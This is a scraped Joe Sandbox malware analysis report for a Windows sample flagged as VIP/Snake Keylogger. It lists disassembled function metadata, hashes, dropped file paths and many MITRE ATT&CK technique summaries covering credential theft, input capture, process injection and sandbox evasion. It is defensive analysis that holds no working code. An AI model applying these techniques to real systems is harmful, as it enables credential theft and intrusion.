API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 3687b10502e8e2c60b559e8772249bffb45f106203df897a9c97cc007f9634ce
Instruction ID: aeb62397c0468e47261d8c45f8c9b41a98aace672046a2f92455a6998c09f724
Opcode Fuzzy Hash: 3687b10502e8e2c60b559e8772249bffb45f106203df897a9c97cc007f9634ce
Instruction Fuzzy Hash: 17E06D70600740CBD760DF28D5047427AE4EF44754F01893DE896D7381E7F4E40AEBA1

Function 00EE1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00EE1775

Part of subcall function 00F1BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00EE195E,?), ref: 00F1BFFE
Part of subcall function 00F1BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F1C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00EE196D

Strings

WIN_XPe, xrefs: 00EE1788

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 052dc7b19c9c3b4781eef87c2e1a9cb0d87994720dc68c2cf0feba2b5c73eefe
Instruction ID: a5186aeb9c2b90d8aa4c60b715f19dd94e60415554eafeebdf18d81147cff105
Opcode Fuzzy Hash: 052dc7b19c9c3b4781eef87c2e1a9cb0d87994720dc68c2cf0feba2b5c73eefe
Instruction Fuzzy Hash: 5CF0157081014CDBCB25DB92C984AECBAB8BB09706F601096E002B2090C7714E85EF60

Function 00F25998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F259AE
PostMessageW.USER32(00000000), ref: 00F259B5

Part of subcall function 00F05244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F052BC

Strings

Shell_TrayWnd, xrefs: 00F259A7

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e5b5af264b911ff6d4f20cd4b080e24dbe2038804847b08f9265a8614a1e04a7
Instruction ID: cf9fb63b57f55f4c22c3097c61d41c92cfce0054e9bada804ab43b71b7cd6ffc
Opcode Fuzzy Hash: e5b5af264b911ff6d4f20cd4b080e24dbe2038804847b08f9265a8614a1e04a7
Instruction Fuzzy Hash: 12D0C9313903157AE674BB709C0BF977A24AF04F51F040835B746AA1D0D9E4A806EA54

Function 00F25964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F2596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F25981

Part of subcall function 00F05244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F052BC

Strings

Shell_TrayWnd, xrefs: 00F25967

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 566e9aa3fcb7f8dc6fdd41fb3eb648727733127c9b87435efedd7edb181f2377
Instruction ID: 2fd763b4474ca00ecbaebb968989fd1663950215eda9f9f3da2fda91ae1d6d81
Opcode Fuzzy Hash: 566e9aa3fcb7f8dc6fdd41fb3eb648727733127c9b87435efedd7edb181f2377
Instruction Fuzzy Hash: 6BD0C931394315B6E674BB709C0BF977A24AF00F51F040835B74AAA1D0D9E49806EA54

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report vnV17JImCH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\autB4AB.tmp

C:\Users\user\AppData\Local\Temp\autB4FB.tmp

C:\Users\user\AppData\Local\Temp\bezzo

C:\Users\user\AppData\Local\Temp\proximobuccal

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
vnV17JImCH.exe

Function 00EA3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00EA49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00EA4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00F09155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00EA3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00EA3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00EA708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00EA3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00EA3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00EA3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 016F4710 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00EA39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 016F44B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157
fileCOMMON

Function 00EA407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Function 00EC541D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre